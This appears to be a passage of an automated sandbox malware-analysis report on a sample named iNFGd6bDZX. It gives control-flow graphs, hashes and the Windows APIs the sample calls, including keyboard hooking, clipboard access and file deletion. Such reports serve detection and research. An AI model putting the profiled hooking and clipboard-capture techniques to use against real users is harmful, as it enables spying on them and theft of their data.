                                                                                                                control_flow_graph 487 6eaa26c-6eaa270 488 6eaa272-6eaa317 GetCurrentProcess 487->488 489 6eaa265-6eaa269 487->489 497 6eaa319-6eaa31f 488->497 498 6eaa320-6eaa354 GetCurrentThread 488->498 497->498 499 6eaa35d-6eaa391 GetCurrentProcess 498->499 500 6eaa356-6eaa35c 498->500 502 6eaa39a-6eaa3b5 call 6eaa458 499->502 503 6eaa393-6eaa399 499->503 500->499 506 6eaa3bb-6eaa3ea GetCurrentThreadId 502->506 503->502 507 6eaa3ec-6eaa3f2 506->507 508 6eaa3f3-6eaa455 506->508 507->508
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 06EAA306
                                                                                                                • GetCurrentThread.KERNEL32 ref: 06EAA343
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 06EAA380
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 06EAA3D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 202ed5d4fc31c80e85b393e6a557eb5e423c3a2bd69164d2781ff62184a08d79
                                                                                                                • Instruction ID: cf03ed1c2fe54471ed258e16cee60f62180bdc770f2a222870c7e9c80daf31bb
                                                                                                                • Opcode Fuzzy Hash: 202ed5d4fc31c80e85b393e6a557eb5e423c3a2bd69164d2781ff62184a08d79
                                                                                                                • Instruction Fuzzy Hash: 3E5146B09003098FDB54DFAAD948B9EBBF1EF49304F24C06AD159AB260D7356948CB65

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 515 6eaa279-6eaa280 516 6eaa289-6eaa317 GetCurrentProcess 515->516 517 6eaa282-6eaa288 515->517 523 6eaa319-6eaa31f 516->523 524 6eaa320-6eaa354 GetCurrentThread 516->524 517->516 523->524 525 6eaa35d-6eaa391 GetCurrentProcess 524->525 526 6eaa356-6eaa35c 524->526 528 6eaa39a-6eaa3b5 call 6eaa458 525->528 529 6eaa393-6eaa399 525->529 526->525 532 6eaa3bb-6eaa3ea GetCurrentThreadId 528->532 529->528 533 6eaa3ec-6eaa3f2 532->533 534 6eaa3f3-6eaa455 532->534 533->534
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 06EAA306
                                                                                                                • GetCurrentThread.KERNEL32 ref: 06EAA343
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 06EAA380
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 06EAA3D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: e321fd2f484749223955c0a79254a81acceab3990c79c825a20cbacf412ef905
                                                                                                                • Instruction ID: 93daf5019f3e079e5a72f78c73f42d6e6f2cd3cc9327ded4747532c237e5467e
                                                                                                                • Opcode Fuzzy Hash: e321fd2f484749223955c0a79254a81acceab3990c79c825a20cbacf412ef905
                                                                                                                • Instruction Fuzzy Hash: B95157B09003098FDB54DFAAD948B9EBBF1FF49304F24C069E149AB360D7356848CB65

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 541 6eaa288-6eaa317 GetCurrentProcess 547 6eaa319-6eaa31f 541->547 548 6eaa320-6eaa354 GetCurrentThread 541->548 547->548 549 6eaa35d-6eaa391 GetCurrentProcess 548->549 550 6eaa356-6eaa35c 548->550 552 6eaa39a-6eaa3b5 call 6eaa458 549->552 553 6eaa393-6eaa399 549->553 550->549 556 6eaa3bb-6eaa3ea GetCurrentThreadId 552->556 553->552 557 6eaa3ec-6eaa3f2 556->557 558 6eaa3f3-6eaa455 556->558 557->558
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 06EAA306
                                                                                                                • GetCurrentThread.KERNEL32 ref: 06EAA343
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 06EAA380
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 06EAA3D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 450f670842975064533266ea45b2f09c20b3cd5b543c8d1f121972112dcdc2ae
                                                                                                                • Instruction ID: 094525c4ac8466e482afac1200556e66c0000d0311e6335f2026331fd9ed4c7d
                                                                                                                • Opcode Fuzzy Hash: 450f670842975064533266ea45b2f09c20b3cd5b543c8d1f121972112dcdc2ae
                                                                                                                • Instruction Fuzzy Hash: 6B5136B09003098FDB54DFAAD948B9EBBF1EF48304F248469D159AB360D7356948CB65

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 565 6eb9230-6eb9255 567 6eb9257-6eb925a 565->567 568 6eb9b18-6eb9b1b 567->568 569 6eb9260-6eb9275 567->569 570 6eb9b1d-6eb9b3c 568->570 571 6eb9b41-6eb9b43 568->571 575 6eb928d-6eb92a3 569->575 576 6eb9277-6eb927d 569->576 570->571 572 6eb9b4a-6eb9b4d 571->572 573 6eb9b45 571->573 572->567 578 6eb9b53-6eb9b5d 572->578 573->572 583 6eb92ae-6eb92b0 575->583 579 6eb927f 576->579 580 6eb9281-6eb9283 576->580 579->575 580->575 584 6eb92c8-6eb9339 583->584 585 6eb92b2-6eb92b8 583->585 596 6eb933b-6eb935e 584->596 597 6eb9365-6eb9381 584->597 586 6eb92ba 585->586 587 6eb92bc-6eb92be 585->587 586->584 587->584 596->597 602 6eb93ad-6eb93c8 597->602 603 6eb9383-6eb93a6 597->603 608 6eb93ca-6eb93ec 602->608 609 6eb93f3-6eb940e 602->609 603->602 608->609 614 6eb9433-6eb9441 609->614 615 6eb9410-6eb942c 609->615 616 6eb9443-6eb944c 614->616 617 6eb9451-6eb94cb 614->617 615->614 616->578 623 6eb9518-6eb952d 617->623 624 6eb94cd-6eb94eb 617->624 623->568 628 6eb94ed-6eb94fc 624->628 629 6eb9507-6eb9516 624->629 628->629 629->623 629->624
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: 1e30ef28ee1515fb727c92b062c72eedec9c886be973de4a3ea7cb72532a1730
                                                                                                                • Instruction ID: be5c0799cd717b3add63d66793bece88be09887638629bd726303636e1b58794
                                                                                                                • Opcode Fuzzy Hash: 1e30ef28ee1515fb727c92b062c72eedec9c886be973de4a3ea7cb72532a1730
                                                                                                                • Instruction Fuzzy Hash: 5E915D30F0021A9FDB54DB64D8907AFB3F6EF89304F109469C50AEB385EB749C468B95

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 632 6ebd030-6ebd04b 633 6ebd04d-6ebd050 632->633 634 6ebd099-6ebd09c 633->634 635 6ebd052-6ebd094 633->635 636 6ebd09e-6ebd0e0 634->636 637 6ebd0e5-6ebd0e8 634->637 635->634 636->637 639 6ebd0ea-6ebd0ec 637->639 640 6ebd0f7-6ebd0fa 637->640 642 6ebd519 639->642 643 6ebd0f2 639->643 644 6ebd0fc-6ebd10b 640->644 645 6ebd143-6ebd146 640->645 646 6ebd51c-6ebd528 642->646 643->640 650 6ebd11a-6ebd126 644->650 651 6ebd10d-6ebd112 644->651 647 6ebd148-6ebd18a 645->647 648 6ebd18f-6ebd192 645->648 646->644 657 6ebd52e-6ebd81b 646->657 647->648 652 6ebd19c-6ebd19f 648->652 653 6ebd194-6ebd199 648->653 654 6ebda4d-6ebda86 650->654 655 6ebd12c-6ebd13e 650->655 651->650 658 6ebd1ae-6ebd1b1 652->658 659 6ebd1a1-6ebd1a3 652->659 653->652 669 6ebda88-6ebda8b 654->669 655->645 845 6ebda42-6ebda4c 657->845 846 6ebd821-6ebd827 657->846 658->646 667 6ebd1b7-6ebd1ba 658->667 664 6ebd1a9 659->664 665 6ebd3d7-6ebd3e0 659->665 664->658 673 6ebd3ef-6ebd3fb 665->673 674 6ebd3e2-6ebd3e7 665->674 670 6ebd1dd-6ebd1e0 667->670 671 6ebd1bc-6ebd1d8 667->671 676 6ebdabe-6ebdac1 669->676 677 6ebda8d-6ebdab9 669->677 680 6ebd229-6ebd22c 670->680 681 6ebd1e2-6ebd224 670->681 671->670 682 6ebd50c-6ebd511 673->682 683 6ebd401-6ebd415 673->683 674->673 684 6ebdac3 call 6ebdba5 676->684 685 6ebdad0-6ebdad3 676->685 677->676 687 6ebd22e-6ebd270 680->687 688 6ebd275-6ebd278 680->688 681->680 682->642 683->642 700 6ebd41b-6ebd42d 683->700 704 6ebdac9-6ebdacb 684->704 695 6ebdaf6-6ebdaf8 685->695 696 6ebdad5-6ebdaf1 685->696 687->688 692 6ebd27a-6ebd2bc 688->692 693 6ebd2c1-6ebd2c4 688->693 692->693 702 6ebd2e1-6ebd2e4 693->702 703 6ebd2c6-6ebd2dc 693->703 707 6ebdafa 695->707 708 6ebdaff-6ebdb02 695->708 696->695 722 6ebd42f-6ebd435 700->722 723 6ebd451-6ebd453 700->723 713 6ebd32d-6ebd330 702->713 714 6ebd2e6-6ebd328 702->714 703->702 704->685 707->708 708->669 709 6ebdb04-6ebdb13 708->709 734 6ebdb7a-6ebdb8f 709->734 735 6ebdb15-6ebdb78 call 6eb6688 709->735 717 6ebd379-6ebd37c 713->717 718 6ebd332-6ebd374 713->718 714->713 727 6ebd37e-6ebd38d 717->727 728 6ebd3c5-6ebd3c7 717->728 718->717 732 6ebd439-6ebd445 722->732 733 6ebd437 722->733 739 6ebd45d-6ebd469 723->739 737 6ebd38f-6ebd394 727->737 738 6ebd39c-6ebd3a8 727->738 741 6ebd3c9 728->741 742 6ebd3ce-6ebd3d1 728->742 744 6ebd447-6ebd44f 732->744 733->744 764 6ebdb90 734->764 735->734 737->738 738->654 747 6ebd3ae-6ebd3c0 738->747 758 6ebd46b-6ebd475 739->758 759 6ebd477 739->759 741->742 742->633 742->665 744->739 747->728 769 6ebd47c-6ebd47e 758->769 759->769 764->764 769->642 770 6ebd484-6ebd4a0 call 6eb6688 769->770 785 6ebd4af-6ebd4bb 770->785 786 6ebd4a2-6ebd4a7 770->786 785->682 787 6ebd4bd-6ebd50a 785->787 786->785 787->642 847 6ebd829-6ebd82e 846->847 848 6ebd836-6ebd83f 846->848 847->848 848->654 849 6ebd845-6ebd858 848->849 851 6ebd85e-6ebd864 849->851 852 6ebda32-6ebda3c 849->852 853 6ebd873-6ebd87c 851->853 854 6ebd866-6ebd86b 851->854 852->845 852->846 853->654 855 6ebd882-6ebd8a3 853->855 854->853 858 6ebd8b2-6ebd8bb 855->858 859 6ebd8a5-6ebd8aa 855->859 858->654 860 6ebd8c1-6ebd8de 858->860 859->858 860->852 863 6ebd8e4-6ebd8ea 860->863 863->654 864 6ebd8f0-6ebd909 863->864 866 6ebd90f-6ebd936 864->866 867 6ebda25-6ebda2c 864->867 866->654 870 6ebd93c-6ebd946 866->870 867->852 867->863 870->654 871 6ebd94c-6ebd963 870->871 873 6ebd972-6ebd98d 871->873 874 6ebd965-6ebd970 871->874 873->867 879 6ebd993-6ebd9ac call 6eb6688 873->879 874->873 883 6ebd9bb-6ebd9c4 879->883 884 6ebd9ae-6ebd9b3 879->884 883->654 885 6ebd9ca-6ebda1e 883->885 884->883 885->867
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q
                                                                                                                • API String ID: 0-831282457
                                                                                                                • Opcode ID: 0273da621371ceccf8f104d648be3e9789b2eb68d198aa8b597b9a7e8ddea93a
                                                                                                                • Instruction ID: 7f36c8b9f578fbebcca469666bc0e75e2a3ca9bbd09d7e4485b490dcac4e5025
                                                                                                                • Opcode Fuzzy Hash: 0273da621371ceccf8f104d648be3e9789b2eb68d198aa8b597b9a7e8ddea93a
                                                                                                                • Instruction Fuzzy Hash: D5623130B002069FCB55DB68D980AAEB7B6FF84304F14A969D0099F365DB76EC46CF85

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 893 6eb4c70-6eb4c94 894 6eb4c96-6eb4c99 893->894 895 6eb4c9b-6eb4cb5 894->895 896 6eb4cba-6eb4cbd 894->896 895->896 897 6eb539c-6eb539e 896->897 898 6eb4cc3-6eb4dbb 896->898 899 6eb53a0 897->899 900 6eb53a5-6eb53a8 897->900 916 6eb4e3e-6eb4e45 898->916 917 6eb4dc1-6eb4e0e call 6eb5519 898->917 899->900 900->894 903 6eb53ae-6eb53bb 900->903 918 6eb4e4b-6eb4ebb 916->918 919 6eb4ec9-6eb4ed2 916->919 930 6eb4e14-6eb4e30 917->930 936 6eb4ebd 918->936 937 6eb4ec6 918->937 919->903 934 6eb4e3b-6eb4e3c 930->934 935 6eb4e32 930->935 934->916 935->934 936->937 937->919
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: fcq$XPcq$\Ocq
                                                                                                                • API String ID: 0-3575482020
                                                                                                                • Opcode ID: 666ebbafb16db00034afd1a04e239326d406b6cf193c34aec17570f10488af54
                                                                                                                • Instruction ID: 8fe4e0bf48b2dfec19e81c7dbf9ccc03dbb9b1969fe5deeeef4aa64c9952f2b3
                                                                                                                • Opcode Fuzzy Hash: 666ebbafb16db00034afd1a04e239326d406b6cf193c34aec17570f10488af54
                                                                                                                • Instruction Fuzzy Hash: F7616F70F002199FEB549FA8C8547AEBBF7FB88700F209429D106AB395DB758C45CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377
                                                                                                                • Opcode ID: 68f17a7df306f855193fd447753148c90cc99b2d11024709489bc94630ec4807
                                                                                                                • Instruction ID: 8732ee2c90cdccbf53a5408a5a4cfae2fb8da63aa41ca556cafbfb87f575356f
                                                                                                                • Opcode Fuzzy Hash: 68f17a7df306f855193fd447753148c90cc99b2d11024709489bc94630ec4807
                                                                                                                • Instruction Fuzzy Hash: D3515034B002059FDB54DB64E990BAF73FAEFC9744F10A46AC50ADB385DA34DC428B95
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: fcq$XPcq
                                                                                                                • API String ID: 0-936005338
                                                                                                                • Opcode ID: 5c07cd1382826f2aee88b33aa36f6ffc0442be455137172582c2f18c1226f32a
                                                                                                                • Instruction ID: 982916833e732c4b9f6dcedd2257ba6106c7173029862173bfd01ab56cb85bb2
                                                                                                                • Opcode Fuzzy Hash: 5c07cd1382826f2aee88b33aa36f6ffc0442be455137172582c2f18c1226f32a
                                                                                                                • Instruction Fuzzy Hash: 09515C70B002099BEB559FA9C854BAEBBE7FB88700F20C529D106AB395DA758C018B95
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2925715461.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_1960000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1e876ad4a810ecc23620aa3d6a7dc562532fab01e47923979e8160e28de22ef7
                                                                                                                • Instruction ID: 03177469768ed2c354c7b17ac9f1631dcea041c08806be499e6df6efaf76e944
                                                                                                                • Opcode Fuzzy Hash: 1e876ad4a810ecc23620aa3d6a7dc562532fab01e47923979e8160e28de22ef7
                                                                                                                • Instruction Fuzzy Hash: 9B516571D043988FCB04CBB9D8102AABFF5EF8A310F1586AAD548D7391DB349845CBE1
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06EA684A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: ed4a53b37c3fcad6338ad48a43620bc9c1bfdb630c11b39b01934551e683ef0b
                                                                                                                • Instruction ID: 401b1ff4f56cb7efed872afcaf1cb05bb1c2b7473a12690c44d2bb5215ecc07f
                                                                                                                • Opcode Fuzzy Hash: ed4a53b37c3fcad6338ad48a43620bc9c1bfdb630c11b39b01934551e683ef0b
                                                                                                                • Instruction Fuzzy Hash: AE41C0B1D103099FDB14CF9AC984ADEBBB5FF49314F24812AE819AB210D771A845CF90
                                                                                                                APIs
                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 06EAB839
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714655100-0
                                                                                                                • Opcode ID: c839b3f9c59d29d527653cd483f435b00bc69edb803de76a1add51585e5451d7
                                                                                                                • Instruction ID: c9e6154764727aaa3190ddcc42dd95c58ba5505cb7e7c9f4bc2088cbc29b1ef9
                                                                                                                • Opcode Fuzzy Hash: c839b3f9c59d29d527653cd483f435b00bc69edb803de76a1add51585e5451d7
                                                                                                                • Instruction Fuzzy Hash: 65412BB8900349CFDB54CF99C888AAABBF5FF88314F24C459D519AB321D775A845CFA0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 220874293-0
                                                                                                                • Opcode ID: 4c3bdf0770b8b4f8b70244557b7818dd858c75f5993437915584288a45c860a7
                                                                                                                • Instruction ID: 6c6dfc2ab7896f9ab7f9981474c13bf6647ea1186fe81111384de00ea9b3929d
                                                                                                                • Opcode Fuzzy Hash: 4c3bdf0770b8b4f8b70244557b7818dd858c75f5993437915584288a45c860a7
                                                                                                                • Instruction Fuzzy Hash: 8131F0B0E01348DFDB50CF99C984BDEBBF5AB48704F248059E408BB294D7B46849CF95
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06EAA557
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 04efa38b2c695809393c064642dfc96ae561e7dfbe3c6eab011aa5e7781858ad
                                                                                                                • Instruction ID: e353064352ffff85fd173938893a58c4a56000caf246cfaa11d1be2c5e83b2c2
                                                                                                                • Opcode Fuzzy Hash: 04efa38b2c695809393c064642dfc96ae561e7dfbe3c6eab011aa5e7781858ad
                                                                                                                • Instruction Fuzzy Hash: A721E4B5900348DFDB10CF9AD984ADEBBF4EB48310F14845AE958A7310C375A944CFA4
                                                                                                                APIs
                                                                                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06EADF0B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HookWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2559412058-0
                                                                                                                • Opcode ID: c47e961350ab33d7d6bda770b5c1f26d58aef53159fd7e9afdb3304c684998ee
                                                                                                                • Instruction ID: 86ba81d183bca5e66126e9cc8c65105ffc4ba4ef46d1a34893f1d2adff7e364e
                                                                                                                • Opcode Fuzzy Hash: c47e961350ab33d7d6bda770b5c1f26d58aef53159fd7e9afdb3304c684998ee
                                                                                                                • Instruction Fuzzy Hash: FB2135B5D002099FCB54DF99C844BEEFBF4EF88314F20842AE458A7250C775A944CFA5
                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 019680B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2925715461.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_1960000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: 75dbb8dc539cb2e83f502528abd58cafd81ec37bdd6115b3bc5d7f0fd9b987ad
                                                                                                                • Instruction ID: 6dbb906588b3aab9472919a8f3739ec503a1fe6abec5a2e7c8bd92a60f3bdc93
                                                                                                                • Opcode Fuzzy Hash: 75dbb8dc539cb2e83f502528abd58cafd81ec37bdd6115b3bc5d7f0fd9b987ad
                                                                                                                • Instruction Fuzzy Hash: F62147B1C0061A9BCB24CFAAC445BDEFBB8FF08320F108569D958A7240D734A940CFA5
                                                                                                                APIs
                                                                                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06EADF0B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HookWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2559412058-0
                                                                                                                • Opcode ID: c0afefcb60ebc22f7951eb84753412e80ea1de16416f6b31876514d73f0b56e6
                                                                                                                • Instruction ID: 69c9bbec576d968ef392f9a8400bd0d1c1b5751a487f33690252778016522da4
                                                                                                                • Opcode Fuzzy Hash: c0afefcb60ebc22f7951eb84753412e80ea1de16416f6b31876514d73f0b56e6
                                                                                                                • Instruction Fuzzy Hash: 322124B5D002099FCB14DF9AC844BEEFBF5EF88324F10842AE458A7250C775A944CFA5
                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 019680B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2925715461.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_1960000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: 3963589f4692ac3a5a90ec0179e0218a7f2c6c6264b603a99177b374f9e70c29
                                                                                                                • Instruction ID: 0ac6329fea34ee553ebda90f6af2d48c706276c2fbc1d84fa0ca9d5a13ebcc0e
                                                                                                                • Opcode Fuzzy Hash: 3963589f4692ac3a5a90ec0179e0218a7f2c6c6264b603a99177b374f9e70c29
                                                                                                                • Instruction Fuzzy Hash: 091124B1C006599BCB14CF9AC544BDEFBB8AB48320F10856AD958A7240D778A944CFA5
                                                                                                                APIs
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0196F107
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2925715461.0000000001960000.00000040.00000800.00020000.00000000.sdmp, Offset: 01960000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_1960000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1890195054-0
                                                                                                                • Opcode ID: 30fd72f9dcce6eddd3e7cbfff937b08b995796c2f0dc35d0bd87e9dddfe2bc3a
                                                                                                                • Instruction ID: 550f49db63f5dbefa889bd3ee6b7893284ec53fd329597f1ab925aceda76f41a
                                                                                                                • Opcode Fuzzy Hash: 30fd72f9dcce6eddd3e7cbfff937b08b995796c2f0dc35d0bd87e9dddfe2bc3a
                                                                                                                • Instruction Fuzzy Hash: B61112B1C00269DBCB10DF9AD544BDEFBF8BF48320F11816AD918A7244D778A944CFA5
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 06EABFD5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: 279358d1b88e0ebeeae5df002fa96b45bde895d0f473ad4c747175dd110c3564
                                                                                                                • Instruction ID: 258a1404a08b4972e5815582c80c5886c40ceba3e61e77c22deede55917c840f
                                                                                                                • Opcode Fuzzy Hash: 279358d1b88e0ebeeae5df002fa96b45bde895d0f473ad4c747175dd110c3564
                                                                                                                • Instruction Fuzzy Hash: 44115BB99043888FCB10CFA9D944BDEBFF4EF49324F24859AD568AB251C335A544CFA1
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 06EA56F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: d24fc3fdc31b01fdc95c42a8452cc3bc898f3848175f40f0f63dd76413750c8f
                                                                                                                • Instruction ID: da18007139bed3d17a279e76165efb83123f3363410bbafd74eac71ac54a87a4
                                                                                                                • Opcode Fuzzy Hash: d24fc3fdc31b01fdc95c42a8452cc3bc898f3848175f40f0f63dd76413750c8f
